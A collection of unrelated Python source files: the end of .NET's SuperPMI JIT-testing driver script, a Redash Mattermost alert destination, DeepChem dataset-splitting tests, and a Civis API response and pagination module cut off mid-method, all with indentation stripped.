local_files = download_urls(urls, basejit_dir, verbose=False, fail_if_not_found=False)
if len(local_files) > 0:
if hashnum > 1:
logging.warning("Warning: the baseline found is not built with the first git hash with JIT code changes; there may be extraneous diffs")
# We expect local_files to be length 1, since we only attempted to download a single file.
if len(local_files) > 1:
logging.error("Error: downloaded more than one file?")
coreclr_args.base_jit_path = local_files[0]
logging.info("Downloaded %s", blob_uri)
logging.info("Using baseline %s", coreclr_args.base_jit_path)
return
# We didn't find a baseline; keep looking
hashnum += 1
# We ran out of hashes of JIT changes, and didn't find a baseline. Give up.
logging.error("Error: no baseline JIT found")
raise RuntimeError("No baseline JIT found")
def setup_args(args):
""" Setup the args for SuperPMI to use.
Args:
args (ArgParse): args parsed by arg parser
Returns:
args (CoreclrArguments)
"""
# Start setting up logging.
# Set up the console logger immediately. Later, after we've parsed some arguments, we'll add the file logger and
# change the console logger level to the one parsed by the arguments. We need to do this initial setup before the first
# logging command is executed.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(sys.stdout)
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
# Parse the arguments
coreclr_args = CoreclrArguments(args, require_built_core_root=False, require_built_product_dir=False, require_built_test_dir=False, default_build_type="Checked")
coreclr_args.verify(args,
"mode", # "mode" is from the `parser.add_subparsers(dest='mode')` call
lambda unused: True,
"Unable to set mode")
coreclr_args.verify(args,
"log_level",
lambda arg: any(arg.upper() == level for level in [ "CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG" ]),
"Unable to set log_level {}".format,
modify_arg=lambda arg: "INFO" if arg is None else arg.upper())
coreclr_args.verify(args,
"log_file",
lambda unused: True,
"Unable to set log_file.")
def setup_spmi_location_arg(spmi_location):
return os.path.abspath(os.path.join(coreclr_args.artifacts_location, "spmi")) if spmi_location is None else spmi_location
coreclr_args.verify(args,
"spmi_location",
lambda unused: True,
"Unable to set spmi_location",
modify_arg=setup_spmi_location_arg)
# Finish setting up logging.
# The spmi_location is the root directory where we put the log file.
# Log everything to the log file and only the specified verbosity to the console logger.
# Now, change the stream handler output level.
stream_handler.setLevel(coreclr_args.log_level)
log_file = None
if coreclr_args.log_file is None:
if hasattr(coreclr_args, "spmi_location"):
log_file = os.path.join(coreclr_args.spmi_location, "superpmi.log")
if not os.path.isdir(coreclr_args.spmi_location):
os.makedirs(coreclr_args.spmi_location)
else:
log_file = coreclr_args.log_file
log_dir = os.path.dirname(log_file)
if not os.path.isdir(log_dir):
print("Creating log directory {} for log file {}".format(log_dir, log_file))
os.makedirs(log_dir)
if log_file is not None:
# If the log file exists, we could use the default behavior and simply append.
# For now, though, just delete it and warn. We can change behavior later if there's user feedback on it.
if os.path.isfile(log_file):
logging.critical("Warning: deleting existing log file %s", log_file)
os.remove(log_file)
file_handler = logging.FileHandler(log_file)
file_handler.setLevel(logging.DEBUG)
logger.addHandler(file_handler)
logging.critical("================ Logging to %s", log_file)
# Finish verifying the arguments
def setup_jit_ee_version_arg(jit_ee_version):
if jit_ee_version is not None:
# The user passed a specific jit_ee_version on the command-line, so use that
return jit_ee_version
return determine_jit_ee_version(coreclr_args)
def setup_jit_path_arg(jit_path):
if jit_path is not None:
return os.path.abspath(jit_path)
return find_tool(coreclr_args, determine_jit_name(coreclr_args), search_path=False) # It doesn't make sense to search PATH for the JIT dll.
def verify_jit_ee_version_arg():
coreclr_args.verify(args,
"jit_ee_version",
lambda unused: True,
"Invalid JIT-EE Version.",
modify_arg=setup_jit_ee_version_arg)
def verify_target_args():
coreclr_args.verify(args,
"target_os",
lambda target_os: check_target_os(coreclr_args, target_os),
lambda target_os: "Unknown target_os {}\nSupported OS: {}".format(target_os, (", ".join(coreclr_args.valid_host_os))),
modify_arg=lambda target_os: target_os if target_os is not None else coreclr_args.host_os) # Default to `host_os`
coreclr_args.verify(args,
"target_arch",
lambda target_arch: check_target_arch(coreclr_args, target_arch),
lambda target_arch: "Unknown target_arch {}\nSupported architectures: {}".format(target_arch, (", ".join(coreclr_args.valid_arches))),
modify_arg=lambda target_arch: target_arch if target_arch is not None else coreclr_args.arch) # Default to `arch`
coreclr_args.verify(args,
"mch_arch",
lambda mch_arch: check_mch_arch(coreclr_args, mch_arch),
lambda mch_arch: "Unknown mch_arch {}\nSupported architectures: {}".format(mch_arch, (", ".join(coreclr_args.valid_arches))),
modify_arg=lambda mch_arch: mch_arch if mch_arch is not None else coreclr_args.target_arch) # Default to `target_arch`
def verify_superpmi_common_args():
coreclr_args.verify(args,
"break_on_assert",
lambda unused: True,
"Unable to set break_on_assert")
coreclr_args.verify(args,
"break_on_error",
lambda unused: True,
"Unable to set break_on_error")
coreclr_args.verify(args,
"skip_cleanup",
lambda unused: True,
"Unable to set skip_cleanup")
coreclr_args.verify(args,
"sequential",
lambda unused: True,
"Unable to set sequential.")
coreclr_args.verify(args,
"spmi_log_file",
lambda unused: True,
"Unable to set spmi_log_file.")
if coreclr_args.spmi_log_file is not None and not coreclr_args.sequential:
print("-spmi_log_file requires --sequential")
sys.exit(1)
def verify_replay_common_args():
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"force_download",
lambda unused: True,
"Unable to set force_download")
coreclr_args.verify(args,
"jit_name",
lambda unused: True,
"Unable to set jit_name.")
coreclr_args.verify(args,
"altjit", # Must be set before `jit_path` (determine_jit_name() depends on it)
lambda unused: True,
"Unable to set altjit.")
coreclr_args.verify(args,
"filter",
lambda unused: True,
"Unable to set filter.")
coreclr_args.verify(args,
"mch_files",
lambda unused: True,
"Unable to set mch_files")
if coreclr_args.mode == "collect":
verify_target_args()
verify_superpmi_common_args()
coreclr_args.verify(args,
"jit_name", # The replay code checks this, so make sure it's set
lambda unused: True,
"Unable to set jit_name.")
coreclr_args.verify(args,
"altjit", # The replay code checks this, so make sure it's set
lambda unused: True,
"Unable to set altjit.")
coreclr_args.verify(args,
"collection_command",
lambda unused: True,
"Unable to set collection_command.")
coreclr_args.verify(args,
"collection_args",
lambda unused: True,
"Unable to set collection_args",
modify_arg=lambda collection_args: collection_args.split(" ") if collection_args is not None else [])
coreclr_args.verify(args,
"pmi",
lambda unused: True,
"Unable to set pmi")
coreclr_args.verify(args,
"crossgen",
lambda unused: True,
"Unable to set crossgen")
coreclr_args.verify(args,
"crossgen2",
lambda unused: True,
"Unable to set crossgen2")
coreclr_args.verify(args,
"assemblies",
lambda unused: True,
"Unable to set assemblies",
modify_arg=lambda items: [item for item in items if os.path.isdir(item) or os.path.isfile(item)])
coreclr_args.verify(args,
"exclude",
lambda unused: True,
"Unable to set exclude")
coreclr_args.verify(args,
"pmi_location",
lambda unused: True,
"Unable to set pmi_location")
coreclr_args.verify(args,
"output_mch_path",
lambda output_mch_path: output_mch_path is None or (not os.path.isdir(os.path.abspath(output_mch_path)) and not os.path.isfile(os.path.abspath(output_mch_path))),
"Invalid output_mch_path \"{}\"; is it an existing directory or file?".format,
modify_arg=lambda output_mch_path: None if output_mch_path is None else os.path.abspath(output_mch_path))
coreclr_args.verify(args,
"merge_mch_files",
lambda unused: True,
"Unable to set merge_mch_files.")
coreclr_args.verify(args,
"mch_files",
lambda items: items is None or len(items) > 0,
"Unable to set mch_files.")
coreclr_args.verify(args,
"skip_collect_mc_files",
lambda unused: True,
"Unable to set skip_collect_mc_files")
coreclr_args.verify(args,
"temp_dir",
lambda unused: True,
"Unable to set temp_dir.")
coreclr_args.verify(args,
"skip_collection_step",
lambda unused: True,
"Unable to set skip_collection_step.")
coreclr_args.verify(args,
"skip_merge_step",
lambda unused: True,
"Unable to set skip_merge_step.")
coreclr_args.verify(args,
"skip_clean_and_verify_step",
lambda unused: True,
"Unable to set skip_clean_and_verify_step.")
coreclr_args.verify(args,
"use_zapdisable",
lambda unused: True,
"Unable to set use_zapdisable")
if (args.collection_command is None) and (args.pmi is False) and (args.crossgen is False) and (args.crossgen2 is False):
print("Either a collection command or `--pmi` or `--crossgen` or `--crossgen2` must be specified")
sys.exit(1)
if (args.collection_command is not None) and (len(args.assemblies) > 0):
print("Don't specify `-assemblies` if a collection command is given")
sys.exit(1)
if (args.collection_command is not None) and (len(args.exclude) > 0):
print("Don't specify `-exclude` if a collection command is given")
sys.exit(1)
if ((args.pmi is True) or (args.crossgen is True) or (args.crossgen2 is True)) and (len(args.assemblies) == 0):
print("Specify `-assemblies` if `--pmi` or `--crossgen` or `--crossgen2` is given")
sys.exit(1)
if args.collection_command is None and args.merge_mch_files is not True:
assert args.collection_args is None
assert (args.pmi is True) or (args.crossgen is True) or (args.crossgen2 is True)
assert len(args.assemblies) > 0
if coreclr_args.merge_mch_files:
assert len(coreclr_args.mch_files) > 0
coreclr_args.skip_collection_step = True
if coreclr_args.crossgen2:
# Can we find crossgen2?
crossgen2_tool_name = "crossgen2.dll"
crossgen2_tool_path = os.path.abspath(os.path.join(coreclr_args.core_root, "crossgen2", crossgen2_tool_name))
if not os.path.exists(crossgen2_tool_path):
print("`--crossgen2` is specified, but couldn't find " + crossgen2_tool_path + ". (Is it built?)")
sys.exit(1)
# Which dotnet will we use to run it?
dotnet_script_name = "dotnet.cmd" if platform.system() == "Windows" else "dotnet.sh"
dotnet_tool_path = os.path.abspath(os.path.join(coreclr_args.runtime_repo_location, dotnet_script_name))
if not os.path.exists(dotnet_tool_path):
dotnet_tool_name = determine_dotnet_tool_name(coreclr_args)
dotnet_tool_path = find_tool(coreclr_args, dotnet_tool_name, search_core_root=False, search_product_location=False, search_path=True, throw_on_not_found=False) # Only search path
coreclr_args.crossgen2_tool_path = crossgen2_tool_path
coreclr_args.dotnet_tool_path = dotnet_tool_path
logging.debug("Using crossgen2 tool %s", coreclr_args.crossgen2_tool_path)
if coreclr_args.dotnet_tool_path is not None:
logging.debug("Using dotnet tool %s", coreclr_args.dotnet_tool_path)
if coreclr_args.temp_dir is not None:
coreclr_args.temp_dir = os.path.abspath(coreclr_args.temp_dir)
logging.debug("Using temp_dir %s", coreclr_args.temp_dir)
if coreclr_args.collection_command is not None:
if os.path.isfile(coreclr_args.collection_command):
coreclr_args.collection_command = os.path.abspath(coreclr_args.collection_command)
else:
# Look on the PATH and in Core_Root. Searching Core_Root is useful so you can just specify "corerun.exe" as the collection command and it can be found.
collection_tool_path = find_tool(coreclr_args, coreclr_args.collection_command, search_core_root=True, search_product_location=False, search_path=True, throw_on_not_found=False)
if collection_tool_path is None:
print("Couldn't find collection command \"{}\"".format(coreclr_args.collection_command))
sys.exit(1)
coreclr_args.collection_command = collection_tool_path
logging.info("Using collection command from PATH: \"%s\"", coreclr_args.collection_command)
elif coreclr_args.mode == "replay":
verify_target_args()
verify_superpmi_common_args()
verify_replay_common_args()
coreclr_args.verify(args,
"jit_path",
os.path.isfile,
"Error: JIT not found at jit_path {}".format,
modify_arg=setup_jit_path_arg)
jit_in_product_location = False
if coreclr_args.product_location.lower() in coreclr_args.jit_path.lower():
jit_in_product_location = True
determined_arch = None
determined_build_type = None
if jit_in_product_location:
# Get os/arch/flavor directory, e.g. split "F:\gh\runtime\artifacts\bin\coreclr\windows.x64.Checked" with "F:\gh\runtime\artifacts\bin\coreclr"
# yielding
# [0]: ""
# [1]: "\windows.x64.Checked"
standard_location_split = os.path.dirname(coreclr_args.jit_path).split(os.path.dirname(coreclr_args.product_location))
assert coreclr_args.host_os in standard_location_split[1]
# Get arch/flavor. Remove leading slash.
specialized_path = standard_location_split[1].split(os.path.sep)[1]
# Split components: "windows.x64.Checked" into:
# [0]: "windows"
# [1]: "x64"
# [2]: "Checked"
determined_split = specialized_path.split(".")
determined_arch = determined_split[1]
determined_build_type = determined_split[2]
# Make a more intelligent decision about the arch and build type
# based on the path of the jit passed
if jit_in_product_location and coreclr_args.build_type not in coreclr_args.jit_path:
coreclr_args.verify(determined_arch.lower(),
"arch",
lambda unused: True,
"Unable to set arch")
coreclr_args.verify(determined_build_type,
"build_type",
coreclr_args.check_build_type,
"Invalid build_type")
elif coreclr_args.mode == "asmdiffs":
verify_target_args()
verify_superpmi_common_args()
verify_replay_common_args()
coreclr_args.verify(args,
"base_jit_path",
lambda unused: True,
"Unable to set base_jit_path")
coreclr_args.verify(args,
"diff_jit_path",
os.path.isfile,
"Error: JIT not found at diff_jit_path {}".format,
modify_arg=setup_jit_path_arg)
coreclr_args.verify(args,
"git_hash",
lambda unused: True,
"Unable to set git_hash")
coreclr_args.verify(args,
"base_git_hash",
lambda unused: True,
"Unable to set base_git_hash")
coreclr_args.verify(args,
"temp_dir",
lambda unused: True,
"Unable to set temp_dir.")
coreclr_args.verify(args,
"gcinfo",
lambda unused: True,
"Unable to set gcinfo.")
coreclr_args.verify(args,
"diff_jit_dump",
lambda unused: True,
"Unable to set diff_jit_dump.")
process_base_jit_path_arg(coreclr_args)
jit_in_product_location = False
if coreclr_args.product_location.lower() in coreclr_args.base_jit_path.lower():
jit_in_product_location = True
determined_arch = None
determined_build_type = None
if jit_in_product_location:
# Get os/arch/flavor directory, e.g. split "F:\gh\runtime\artifacts\bin\coreclr\windows.x64.Checked" with "F:\gh\runtime\artifacts\bin\coreclr"
# yielding
# [0]: ""
# [1]: "\windows.x64.Checked"
standard_location_split = os.path.dirname(coreclr_args.base_jit_path).split(os.path.dirname(coreclr_args.product_location))
assert coreclr_args.host_os in standard_location_split[1]
# Get arch/flavor. Remove leading slash.
specialized_path = standard_location_split[1].split(os.path.sep)[1]
# Split components: "windows.x64.Checked" into:
# [0]: "windows"
# [1]: "x64"
# [2]: "Checked"
determined_split = specialized_path.split(".")
determined_arch = determined_split[1]
determined_build_type = determined_split[2]
# Make a more intelligent decision about the arch and build type
# based on the path of the jit passed
if jit_in_product_location and coreclr_args.build_type not in coreclr_args.base_jit_path:
coreclr_args.verify(determined_build_type,
"build_type",
coreclr_args.check_build_type,
"Invalid build_type")
if jit_in_product_location and coreclr_args.arch not in coreclr_args.base_jit_path:
coreclr_args.verify(determined_arch.lower(),
"arch",
lambda unused: True,
"Unable to set arch")
coreclr_args.verify(determine_coredis_tools(coreclr_args),
"coredistools_location",
os.path.isfile,
"Unable to find coredistools.")
if coreclr_args.temp_dir is not None:
coreclr_args.temp_dir = os.path.abspath(coreclr_args.temp_dir)
logging.debug("Using temp_dir %s", coreclr_args.temp_dir)
elif coreclr_args.mode == "upload":
verify_target_args()
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"az_storage_key",
lambda item: item is not None,
"Specify az_storage_key or set environment variable CLRJIT_AZ_KEY to the key to use.",
modify_arg=lambda arg: os.environ["CLRJIT_AZ_KEY"] if arg is None and "CLRJIT_AZ_KEY" in os.environ else arg)
coreclr_args.verify(args,
"jit_location",
lambda unused: True,
"Unable to set jit_location.")
coreclr_args.verify(args,
"mch_files",
lambda unused: True,
"Unable to set mch_files")
elif coreclr_args.mode == "download":
verify_target_args()
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"force_download",
lambda unused: True,
"Unable to set force_download")
coreclr_args.verify(args,
"filter",
lambda unused: True,
"Unable to set filter.")
coreclr_args.verify(args,
"mch_files",
lambda unused: True,
"Unable to set mch_files")
elif coreclr_args.mode == "list-collections":
verify_target_args()
verify_jit_ee_version_arg()
coreclr_args.verify(args,
"all",
lambda unused: True,
"Unable to set all")
coreclr_args.verify(args,
"local",
lambda unused: True,
"Unable to set local")
elif coreclr_args.mode == "merge-mch":
coreclr_args.verify(args,
"output_mch_path",
lambda output_mch_path: not os.path.isdir(os.path.abspath(output_mch_path)) and not os.path.isfile(os.path.abspath(output_mch_path)),
"Invalid output_mch_path \"{}\"; is it an existing directory or file?".format,
modify_arg=lambda output_mch_path: os.path.abspath(output_mch_path))
coreclr_args.verify(args,
"pattern",
lambda unused: True,
"Unable to set pattern")
return coreclr_args
################################################################################
# main
################################################################################
def main(args):
""" Main method
"""
# await/async requires python >= 3.7
if sys.version_info < (3, 7):
print("Error: the async/await language features used by this script require Python 3.7 or greater.")
print("Please install Python 3.7 or greater.")
return 1
# Force tiered compilation off. It will affect both collection and replay.
# REVIEW: Is this true for replay? We specifically set this when doing collections. Can we remove this line?
# Or move it more close to the location that requires it, and output to the console that we're setting this?
os.environ["COMPlus_TieredCompilation"] = "0"
# Parse the arguments.
coreclr_args = setup_args(args)
#
# Run the selected command
#
success = True
if coreclr_args.mode == "collect":
# Start a new SuperPMI Collection.
begin_time = datetime.datetime.now()
logging.info("SuperPMI collect")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
collection = SuperPMICollect(coreclr_args)
success = collection.collect()
if success and coreclr_args.output_mch_path is not None:
logging.info("Generated MCH file: %s", coreclr_args.output_mch_path)
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "replay":
# Start a new SuperPMI Replay
process_mch_files_arg(coreclr_args)
mch_files = get_mch_files_for_replay(coreclr_args)
if mch_files is None:
return 1
begin_time = datetime.datetime.now()
logging.info("SuperPMI replay")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
jit_path = coreclr_args.jit_path
logging.info("JIT Path: %s", jit_path)
logging.info("Using MCH files:")
for mch_file in mch_files:
logging.info(" %s", mch_file)
replay = SuperPMIReplay(coreclr_args, mch_files, jit_path)
success = replay.replay()
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "asmdiffs":
# Start a new SuperPMI Replay with AsmDiffs
process_mch_files_arg(coreclr_args)
mch_files = get_mch_files_for_replay(coreclr_args)
if mch_files is None:
return 1
begin_time = datetime.datetime.now()
logging.info("SuperPMI ASM diffs")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
base_jit_path = coreclr_args.base_jit_path
diff_jit_path = coreclr_args.diff_jit_path
logging.info("Base JIT Path: %s", base_jit_path)
logging.info("Diff JIT Path: %s", diff_jit_path)
logging.info("Using MCH files:")
for mch_file in mch_files:
logging.info(" %s", mch_file)
asm_diffs = SuperPMIReplayAsmDiffs(coreclr_args, mch_files, base_jit_path, diff_jit_path)
success = asm_diffs.replay_with_asm_diffs()
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "upload":
begin_time = datetime.datetime.now()
logging.info("SuperPMI upload")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
upload_mch(coreclr_args)
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "download":
begin_time = datetime.datetime.now()
logging.info("SuperPMI download")
logging.debug("------------------------------------------------------------")
logging.debug("Start time: %s", begin_time.strftime("%H:%M:%S"))
# Processing the arg does the download and caching
process_mch_files_arg(coreclr_args)
end_time = datetime.datetime.now()
elapsed_time = end_time - begin_time
logging.debug("Finish time: %s", end_time.strftime("%H:%M:%S"))
logging.debug("Elapsed time: %s", elapsed_time)
elif coreclr_args.mode == "list-collections":
if coreclr_args.local:
list_collections_local_command(coreclr_args)
else:
list_collections_command(coreclr_args)
elif coreclr_args.mode == "merge-mch":
success = merge_mch(coreclr_args)
else:
raise NotImplementedError(coreclr_args.mode)
return 0 if success else 1
################################################################################
# __main__
################################################################################
if __name__ == "__main__":
args = parser.parse_args()
sys.exit(main(args))
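# Illustrative invocations (mode names taken from the dispatch in main();
# the script name is assumed and mode-specific flags are omitted):
#   python superpmi.py collect
#   python superpmi.py replay
#   python superpmi.py asmdiffs
#   python superpmi.py download
#   python superpmi.py merge-mch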
|
import logging
import requests
from redash.destinations import *
from redash.utils import json_dumps
class Mattermost(BaseDestination):
@classmethod
def configuration_schema(cls):
return {
"type": "object",
"properties": {
"url": {"type": "string", "title": "Mattermost Webhook URL"},
"username": {"type": "string", "title": "Username"},
"icon_url": {"type": "string", "title": "Icon (URL)"},
"channel": {"type": "string", "title": "Channel"},
},
}
@classmethod
def icon(cls):
return "fa-bolt"
def notify(self, alert, query, user, new_state, app, host, metadata, options):
if alert.custom_subject:
text = alert.custom_subject
elif new_state == "triggered":
text = "#### " + alert.name + " just triggered"
else:
text = "#### " + alert.name + " went back to normal"
payload = {"text": text}
if alert.custom_body:
payload["attachments"] = [
{"fields": [{"title": "Description", "value": alert.custom_body}]}
]
if options.get("username"):
payload["username"] = options.get("username")
if options.get("icon_url"):
payload["icon_url"] = options.get("icon_url")
if options.get("channel"):
payload["channel"] = options.get("channel")
try:
resp = requests.post(
options.get("url"), data=json_dumps(payload), timeout=5.0
)
logging.warning(resp.text)
if resp.status_code != 200:
logging.error(
"Mattermost webhook send ERROR. status_code => {status}".format(
status=resp.status_code
)
)
except Exception:
logging.exception("Mattermost webhook send ERROR.")
register(Mattermost)
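# Illustrative only (hypothetical values): with options such as
#   {"url": "https://mm.example.com/hooks/abc123", "username": "redash", "channel": "alerts"}
# a triggered alert named "CPU high" with no custom subject posts
#   {"text": "#### CPU high just triggered", "username": "redash", "channel": "alerts"}
# to the configured webhook URL.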
|
"""
Tests for dataset loading and splitting.
"""
import os
import tempfile
import shutil
import deepchem as dc
def test_unlabelled():
current_dir = os.path.dirname(os.path.abspath(__file__))
input_file = os.path.join(current_dir, "../../data/tests/no_labels.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=[], feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
assert len(dataset.X)
def test_scaffold_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
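# DeepChem's train_valid_test_split defaults to frac_train=0.8, frac_valid=0.1,
# frac_test=0.1, hence the 8/1/1 split of this 10-row dataset asserted below.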
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_scaffold_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_random_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_random_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
tasks = ["log-solubility"]
input_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_log_solubility_dataset():
"""Test of loading for simple log-solubility dataset."""
current_dir = os.path.dirname(os.path.realpath(__file__))
input_file = "../../models/tests/assets/example.csv"
input_file = os.path.join(current_dir, input_file)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks,
feature_field="smiles",
featurizer=dc.feat.CircularFingerprint(size=1024))
dataset = loader.create_dataset(input_file)
assert len(dataset) == 10
def test_dataset_move():
"""Test that dataset can be moved and reloaded."""
current_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = tempfile.mkdtemp()
data_dir = os.path.join(base_dir, "data")
moved_data_dir = os.path.join(base_dir, "moved_data")
dataset_file = os.path.join(current_dir,
"../../models/tests/assets/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
featurized_dataset = loader.create_dataset(dataset_file, data_dir)
n_dataset = len(featurized_dataset)
# Now perform move
shutil.move(data_dir, moved_data_dir)
moved_featurized_dataset = dc.data.DiskDataset(moved_data_dir)
assert len(moved_featurized_dataset) == n_dataset
|
from __future__ import absolute_import
import requests
from civis._utils import camel_to_snake
class CivisClientError(Exception):
def __init__(self, message, response):
self.status_code = response.status_code
self.error_message = message
def __str__(self):
return self.error_message
def _response_to_json(response):
"""Parse a raw response to a dict.
Parameters
----------
response: requests.Response
A raw response returned by an API call.
Returns
-------
dict | None
The data in the response body or None if the response has no
content.
Raises
------
CivisClientError
If the data in the raw response cannot be parsed.
"""
if response.content == b'':
return None
else:
try:
return response.json()
except ValueError:
raise CivisClientError("Unable to parse JSON from response",
response)
def convert_response_data_type(response, headers=None, return_type='snake'):
"""Convert a raw response into a given type.
Parameters
----------
response : list, dict, or `requests.Response`
Convert this object into a different response object.
headers : dict, optional
If given and the return type supports it, attach these headers to the
converted response. If `response` is a `requests.Response`, the headers
will be inferred from it.
return_type : string, {'snake', 'raw', 'pandas'}
Convert the response to this type. See documentation on
`civis.APIClient` for details of the return types.
Returns
-------
list, dict, `civis.response.Response`, `requests.Response`,
`pandas.DataFrame`, or `pandas.Series`
Depending on the value of `return_type`.
"""
assert return_type in ['snake', 'raw', 'pandas'], 'Invalid return type'
if return_type == 'raw':
return response
if isinstance(response, requests.Response):
headers = response.headers
data = _response_to_json(response)
else:
data = response
if return_type == 'pandas':
import pandas as pd
if isinstance(data, list):
return pd.DataFrame.from_records(data)
# there may be nested objects or arrays in this series
return pd.Series(data)
elif return_type == 'snake':
if isinstance(data, list):
return [Response(d, headers=headers) for d in data]
return Response(data, headers=headers)
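# A minimal usage sketch (hypothetical data), showing how return_type changes
# the result:
#
#   raw = [{'queryId': 1}, {'queryId': 2}]
#   convert_response_data_type(raw, return_type='pandas')
#   # -> pandas.DataFrame with a 'queryId' column
#   convert_response_data_type(raw, return_type='snake')
#   # -> [Response({'query_id': 1}), Response({'query_id': 2})]
#   convert_response_data_type(raw, return_type='raw')
#   # -> the list unchanged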
class Response(dict):
"""Custom Civis response object.
Attributes
----------
json_data : dict | None
This is `json_data` as it is originally returned to the user without
the key names being changed. See Notes. None is used if the original
response returned a 204 No Content response.
headers : dict
This is the header for the API call without changing the key names.
calls_remaining : int
Number of API calls remaining before rate limit is reached.
rate_limit : int
Total number of calls per API rate limit period.
Notes
-----
The main features of this class are that it maps camelCase to snake_case
at the top level of the json object and attaches keys as attributes.
Nested object keys are not changed.
"""
def __init__(self, json_data, snake_case=True, headers=None):
self.json_data = json_data
if headers is not None:
# this circumvents recursive calls
self.headers = headers
self.calls_remaining = headers.get('X-RateLimit-Remaining')
self.rate_limit = headers.get('X-RateLimit-Limit')
if json_data is not None:
for key, v in json_data.items():
if snake_case:
key = camel_to_snake(key)
if isinstance(v, dict):
val = Response(v, False)
elif isinstance(v, list):
val = [Response(o) if isinstance(o, dict) else o
for o in v]
else:
val = v
self.update({key: val})
self.__dict__.update({key: val})
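# A minimal usage sketch (hypothetical payload): top-level camelCase keys are
# snake_cased and attached as attributes, while nested dict keys keep their
# original names, per the class docstring.
#
#   r = Response({'createdAt': '2020-01-01', 'subObject': {'innerKey': 1}})
#   r.created_at           # -> '2020-01-01'
#   r.sub_object.innerKey  # -> 1 (nested key not converted)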
class PaginatedResponse:
"""A response object which is an iterator
Parameters
----------
path : str
Make GET requests to this path.
initial_params : dict
Query params that should be passed along with each request. Note that
if `initial_params` contains the keys `page_num` or `limit`, they will
be ignored. The given dict is not modified.
endpoint : `civis.base.Endpoint`
An endpoint used to make API requests.
Notes
-----
This response is returned automatically by endpoints which support
pagination when the `iterator` kwarg is specified.
Examples
--------
>>> client = civis.APIClient()
>>> queries = client.queries.list(iterator=True)
>>> for query in queries:
... print(query['id'])
"""
def __init__(self, path, initial_params, endpoint):
self._path = path
self._params = initial_params.copy()
self._endpoint = endpoint
# We are paginating through all items, so start at the beginning and
# let the API determine the limit.
self._params['page_num'] = 1
self._params.pop('limit', None)
self._iter = None
def __iter__(self):
return self
def _get_iter(self):
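# Request pages sequentially, starting from page_num=1 set in __init__;
# stop when the API returns an empty page, otherwise convert and yield
# each item, then advance to the next page.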
while True:
response = self._endpoint._make_request('GET',
self._path,
self._params)
page_data = _response_to_json(response)
if len(page_data) == 0:
return
for data in page_data:
converted_data = convert_response_data_type(
data,
headers=response.headers,
return_type=self._endpoint._return_type
)
yield converted_data
self._params['page_num'] += 1
def __next__(self):
if self._iter is None:
self._iter = self._get_iter()
